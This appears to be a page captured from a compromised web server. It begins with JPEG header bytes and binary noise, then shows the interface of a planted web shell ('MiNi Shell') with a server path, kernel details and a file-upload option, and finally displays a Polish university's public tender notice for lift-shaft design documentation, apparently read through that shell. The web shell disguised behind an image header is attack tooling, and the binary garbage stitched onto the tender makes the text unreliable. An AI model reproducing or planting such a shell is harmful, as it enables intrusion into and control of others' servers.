JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250606/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250606/0026398101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie dok. projektowej na budowę windy zewn. (szyb windowy) dla Bud. Głów. nr 1 Politech. Morskiej w Szcz. w ramach projektu pt. „Morze dostępności - Politechnika bez barier” - postępowanie 2. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Politechnika Morska w Szczecinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000145129</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wały Chrobrego 1-2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczecin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">70-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL424 - Miasto Szczecin</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ar@pm.szczecin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pm.szczecin.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie dok. projektowej na budowę windy zewn. (szyb windowy) dla Bud. Głów. nr 1 Politech. Morskiej w Szcz. w ramach projektu pt. „Morze dostępności - Politechnika bez barier” - postępowanie 2. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-36b8e360-9801-4275-9daf-14cedcbfdadc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00263981</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> FERS.03.01-IP.08-0025/24 – Morze Dostępności – Politechnika bez barier </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/pm_szczecin <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/pm_szczecin</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W niniejszym postępowaniu<br/>komunikacja Zamawiającego z wykonawcami odbywa się za pomocą środków komunikacji elektronicznej. Komunikacja między<br/>Zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje przekazywane są w formie<br/>elektronicznej za pośrednictwem Platformy: https://platformazakupowa.pl/pn/pm_szczecin<br/>2) Wszelką korespondencję związaną z niniejszym postępowaniem, należy przekazywać za pośrednictwem Platformy.<br/>Korespondencję uważa się za przekazaną w terminie, jeżeli dotrze do Zamawiającego przed upływem wymaganego terminu.<br/>3) Dokumenty muszą zostać opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">AR.262.5.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Przedmiotem zamówienia jest wykonanie kompletnej dokumentacji projektowo-kosztorysowej dla następującego zakresu<br/>planowanych prac: budowa zewnętrznego szybu windowego dla Budynku Głównego nr 1 Politechniki Morskiej w Szczecinie<br/>wraz z montażem dźwigu osobowego dostosowanego do potrzeb osób z niepełnosprawnościami w ramach projektu pt.<br/>„Morze dostępności - Politechnika bez barier” współfinansowanego ze środków Europejskiego Funduszu Społecznego Plus<br/>w ramach Funduszy Europejskich dla Rozwoju Społecznego na lata 2021-2027 (FERS).<br/>Projektowanie szybu i dźwigu osobowego powinno uwzględniać dotychczasowe zalecenia Miejskiego Konserwatora<br/>Zabytków oraz obowiązujące na bieżąco uzgodnienia.<br/>Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 1a do SWZ – Opis Przedmiotu Zamówienia (OPZ)<br/>oraz w załącznikach do niego.<br/>Składowe przedmiotu zamówienia, jakie należy przekazać Zamawiającemu, są wskazane<br/>w § 2 wzoru umowy, stanowiącego załącznik nr 6 do SWZ.<br/>W zakres przedmiotu zamówienia wchodzi sporządzenie opracowań pobocznych oraz przeprowadzenie niezbędnych<br/>procedur administracyjnych i uzyskanie wymaganych dla zrealizowania przedmiotu zamówienia decyzji, postanowień,<br/>warunków technicznych, uzgodnień i innych, takich jak w szczególności: sporządzenie mapy do celów projektowych,<br/>uzyskanie decyzji o lokalizacji inwestycji celu publicznego/wypisu i wyrysu z MPZP, decyzji konserwatora zezwalającej na<br/>prowadzenie robót budowlanych, decyzji środowiskowej (jeśli będzie wymagana) oraz uzyskanie wszelkich innych<br/>uzgodnień, postanowień i decyzji administracyjnych niezbędnych dla zrealizowania przedmiotu zamówienia.<br/>Sprawowanie nadzoru autorskiego nie jest elementem przedmiotu zamówienia. Zamawiający może zlecić pełnienie nadzoru<br/>autorskiego wybranemu przez siebie projektantowi w ramach oddzielnego postępowania. Ewentualne opracowania dotyczące ekspertyz technicznych, budowlanych, pożarowych i inne, niezbędne dla realizacji<br/>przedmiotu zamówienia, są po stronie Wykonawcy. Zamawiający informuje, że zlecone zostało przygotowanie ekspertyzy<br/>technicznej stanu ppoż. dla Budynku Głównego, która zostanie udostępniona jako materiał pomocniczy do opracowania<br/>dokumentacji projektowej, niezwłocznie po jej otrzymaniu. Zlecona ekspertyza p.poż. dotyczy stanu obecnego Budynku<br/>Głównego, bez planowanego szybu windowego.<br/>2) Nomenklatura wg CPV:<br/>71200000-0 Usługi architektoniczne i podobne<br/>71420000-8 Architektoniczne usługi zagospodarowania terenu<br/>71220000-6 Usługi projektowania architektonicznego<br/>71240000-2 Usługi architektoniczne, inżynieryjne i planowania<br/>71250000-5 Usługi architektoniczne, inżynieryjne i pomiarowe<br/>71210000-3 Doradcze usługi architektoniczne<br/>71320000-7 Usługi inżynieryjne w zakresie projektowania<br/>71327000-6 Usługi projektowania konstrukcji nośnych<br/>71244000-0 Kalkulacja kosztów, monitoring kosztów<br/>42416100-6 Windy<br/>3) Podane przez Zamawiającego ewentualne nazwy (znaki towarowe), normy mają charakter przykładowy, a ich wskazanie<br/>ma na celu określenie oczekiwanego standardu, przy czym Zamawiający dopuszcza składanie ofert równoważnych w<br/>zakresie sporządzonego opisu przedmiotu zamówienia.<br/>4) W przypadku, gdy Zamawiający odnosi się w opisie przedmiotu zamówienia do norm, ocen technicznych, specyfikacji<br/>technicznych i systemów referencji technicznych, o których mowa w art. 101 ust.1 pkt 2 oraz ust.3 ustawy Pzp, dopuszcza<br/>się rozwiązania równoważne opisywanym.<br/>5) Przedmiot zamówienia określono poprzez wskazanie obiektywnych cech technicznych<br/>i jakościowych oraz standardów, dla których określenia dopuszcza się wskazanie przykładowych znaków towarowych.<br/>6) Gwarancja i rękojmia<br/>- Na wykonane usługi Wykonawca udzieli gwarancji na okres 60 miesięcy .<br/>- Okres rękojmi za wady opracowanej przez Wykonawcę dokumentacji upłynie z chwilą wygaśnięcia odpowiedzialności<br/>wszystkich wykonawców robót budowlanych z tytułu ich rękojmi za wady robót przez nich zrealizowanych na podstawie<br/>dokumentacji będącej przedmiotem zamówienia, lecz nie dłużej niż 5 lat od dnia upływu terminu gwarancji,<br/>o którym mowa w tiret wcześniejsze.<br/>- Niezależnie od uprawnień z tytułu rękojmi za wady przedmiotu umowy Zamawiającemu przysługiwać będzie prawo<br/>żądania od Wykonawcy naprawienia szkody powstałej wskutek nieosiągnięcia w zrealizowanych robotach parametrów<br/>zgodnych z normami i przepisami techniczno-budowlanymi.<br/>- Wykonawca odpowiada za wadę również po upływie okresu gwarancji lub rękojmi, jeżeli Zamawiający powiadomi<br/>Wykonawcę o wadzie przed upływem tych okresów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71200000-0 - Usługi architektoniczne i podobne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71240000-2 - Usługi architektoniczne, inżynieryjne i planowania</p> <p class="mb-0">71250000-5 - Usługi architektoniczne, inżynieryjne i pomiarowe</p> <p class="mb-0">71210000-3 - Doradcze usługi architektoniczne</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71327000-6 - Usługi projektowania konstrukcji nośnych</p> <p class="mb-0">71244000-0 - Kalkulacja kosztów, monitoring kosztów</p> <p class="mb-0">42416100-6 - Windy</p> <p class="mb-0">71420000-8 - Architektoniczne usługi zagospodarowania terenu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">170 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami i<br/>odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Cena (C) – 60 %<br/>Skrócony termin realizacji (T) – 24%<br/>Wysokość kary umownej (K) – 16%<br/>Łączna liczba punktów za ofertę = liczba punktów za cenę brutto (maks. 100)<br/>a) Kryterium „Cena” (C) zostanie obliczone według następującego wzoru:<br/>(Cena najniższej oferty / Cena badanej oferty) x 60 = liczba punktów za kryterium Cena (C)<br/>b) Kryterium „Skrócony termin realizacji” (T) będzie punktowane według następujących zasad:<br/>Maksymalna liczba punktów uzyskanych w kryterium „Skrócony termin realizacji” (T) –<br/>24 pkt.<br/>Wykonawca może zaoferować skrócony termin końcowy na wykonanie całości zamówienia. Do umowy zostanie wpisany termin<br/>realizacji całości zamówienia wyliczony jako 170 dni minus<br/>liczba dni oferowanego skrócenia terminu, zadeklarowany przez Wykonawcę (T oferowany)<br/>w niniejszym kryterium.<br/>Zamawiający wymaga wykonania zamówienia w terminie nie dłuższym niż 170 dni od dnia<br/>podpisania umowy w sprawie realizacji przedmiotowego zamówienia, w związku z czym T max = 170 dni<br/>Wykonawca otrzyma 24 pkt gdy skróci termin wykonania całości zamówienia o 48 dni.<br/>Za każdy dzień skrócenia terminu wykonania całości zamówienia zostanie przyznane 0,5 pkt dodatkowo wg wzoru:<br/>T = Ilość dni oferowanego skrócenia terminu x 0,5 pkt = ilość przyznanych punktów<br/>W sytuacji gdy Wykonawca nie złoży oświadczenia dotyczącego skrócenia terminu wykonania zamówienia, Zamawiający przyjmie<br/>maksymalny termin wykonania zamówienia 170 dni i przyzna 0 pkt. do porównania z pozostałymi ofertami w kryterium „Skrócony<br/>termin realizacji” (T).<br/>W przypadku zaproponowania przez Wykonawcę skrócenia terminu realizacji o więcej, niż 48 dni, Zamawiający uwzględni do oceny<br/>ofert skrócenie terminu o 48 dni (największa możliwa punktowana liczba dni skrócenia terminu wykonania całości zamówienia),<br/>przyzna Wykonawcy maksymalną liczbę punktów w kryterium „T”, tj. 24 pkt, natomiast do umowy zostanie zapisany termin realizacji<br/>całości zamówienia wynikający z zadeklarowanej przez Wykonawcę<br/>w ofercie liczby dni skrócenia terminu.<br/>c) Kryterium „Wysokość kary umownej” (K) będzie punktowane według następujących zasad:<br/>Maksymalna liczba punktów uzyskanych w kryterium „Wysokość kary umownej” (K) – 16 pkt.<br/>Wykonawca może zaproponować większą wysokość kary umownej od minimalnego poziomu wymaganego przez Zamawiającego.<br/>Do umowy zostanie wpisana wysokość kary umownej zaproponowana przez Wykonawcę (K oferowana) w niniejszym kryterium.<br/>Zamawiający wymaga minimalnego poziomu kary umownej w wysokości 0,5% wynagrodzenia całkowitego brutto, w związku z czym<br/>K min = 0,5%<br/>Wykonawca otrzyma 16 pkt gdy zaproponuje wysokość kary umownej zwiększoną o 2%, tj. do poziomu 2,5%, w związku z czym K<br/>max = 2,5%<br/>Liczba punktów w kryterium „Wysokość kary umownej” (K) zostanie obliczona w następujący sposób:<br/>K= ((K oferowana) – (K min)): 2 x16<br/>W sytuacji gdy Wykonawca zaoferuje niższą wysokość kary umownej, niż wymagane przez Zamawiającego K min = 0,5%, oferta<br/>będzie podlegać odrzuceniu na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>W sytuacji gdy Wykonawca nie złoży oświadczenia dotyczącego proponowanej wysokości kary umownej, Zamawiający przyjmie<br/>minimalny poziom kary umownej K min = 0,5% i przyzna<br/>0 pkt. do porównania z pozostałymi ofertami w kryterium „Wysokość kary umownej” (K).<br/>W przypadku zaproponowania przez Wykonawcę kary umownej o wysokości wyższej<br/>niż K max = 2,5%, Zamawiający przyjmie przy ocenie ofert poziom (K oferowana) = 2,5% (najwyższy punktowany poziom kary<br/>umownej), przyzna Wykonawcy maksymalną liczbę punktów<br/>w kryterium „K”, tj. 16 pkt, natomiast do umowy zostanie zapisana wysokość kary umownej zadeklarowana przez Wykonawcę w<br/>ofercie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">skrócony termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">24</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wysokość kary umownej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">16</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, Zamawiający określa warunki udziału w postępowaniu dotyczące:<br/>1) zdolności technicznej lub zawodowej:<br/>• Warunek w rozumieniu Zamawiającego spełni Wykonawca, który wykaże, że wykonał<br/>z należytą starannością – nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w<br/>tym okresie – co najmniej:<br/> 2 usługi projektowe polegające na wykonaniu dokumentacji projektowej (projekt budowlany, projekt architektonicznobudowlany,<br/>projekt techniczny lub projekt wykonawczy), o wartości nie niższej niż 40 000,00 zł brutto każda, obejmujące<br/>rozbudowę, odbudowę, nadbudowę lub przebudowę budynku wpisanego do rejestru zabytków, bądź budowę nowego<br/>budynku na obszarze wpisanym do rejestru zabytków.<br/>W przypadku, gdy jakakolwiek wartość dotycząca ww. warunku wyrażona będzie w walucie obcej, Zamawiający przeliczy tę<br/>wartość w oparciu o średni kurs walut NBP dla danej waluty z daty wszczęcia postępowania o udzielenie zamówienia<br/>publicznego (za datę wszczęcia postępowania rozumie się datę ogłoszenia o zamówieniu). Jeżeli w tym dniu nie będzie<br/>opublikowany średni kurs NBP, Zamawiający przyjmie kurs średni z ostatniej tabeli przed wszczęciem postępowania.<br/>W przypadku posługiwania się przez wykonawcę cudzym potencjałem, wykonawcy mogą polegać na zdolnościach<br/>podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te<br/>zdolności są wymagane<br/>W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie zamówienia oceniany będzie ich łączny<br/>potencjał techniczny oraz osoby zdolne do wykonania zamówienia.<br/>• Warunek w rozumieniu Zamawiającego spełni wykonawca, który będzie dysponował co najmniej po jednej osobie<br/>posiadającej uprawnienia budowlane (w myśl Rozdziału 2 ustawy Prawo budowlane):<br/> do projektowania w specjalności architektonicznej bez ograniczeń, będące ważne od co najmniej 5 lat (licząc od daty<br/>wydania decyzji przyznającej uprawnienia),<br/> do projektowania w specjalności inżynieryjnej konstrukcyjno-budowlanej bez ograniczeń, będące ważne od co najmniej 5 lat<br/>(licząc od daty wydania decyzji przyznającej uprawnienia),<br/> do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych<br/>bez ograniczeń,<br/> do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych bez ograniczeń,<br/> do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,<br/>wodociągowych i kanalizacyjnych bez ograniczeń.<br/>Zamawiający dopuszcza sprawowanie przez jedną osobę więcej niż jednej z ww. funkcji,<br/>W przypadku posługiwania się przez wykonawcę cudzym potencjałem, wykonawcy mogą polegać na zdolnościach<br/>podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie zamówienia oceniany będzie ich łączny<br/>potencjał techniczny oraz osoby zdolne do wykonania zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie<br/>z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została<br/>najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących<br/>podmiotowych środków dowodowych:<br/>1) Wykazu usług na podstawie wzoru stanowiącego Załącznik nr 4 do SWZ, z którego wynikać będzie, że Wykonawca wykonał z<br/>należytą starannością – nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie – co najmniej:<br/> 2 usługi projektowe polegające na wykonaniu dokumentacji projektowej (projekt budowlany, projekt architektoniczno-budowlany,<br/>projekt techniczny lub projekt wykonawczy), o wartości nie niższej niż 40 000,00 zł brutto każda, obejmujące rozbudowę, odbudowę,<br/>nadbudowę lub przebudowę budynku wpisanego do rejestru zabytków, bądź budowę nowego budynku na obszarze wpisanym do<br/>rejestru zabytków<br/>wraz z podaniem ich wartości, przedmiotu, dat wykonania oraz podmiotów, na rzecz których usługi zostały wykonane, oraz<br/>załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z<br/>przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy.<br/>Wymagana forma:<br/>Dokument musi być złożony w formie elektronicznej podpisanej kwalifikowanym podpisem elektronicznym lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby upoważnionej do reprezentowania wykonawców<br/>zgodnie z formą 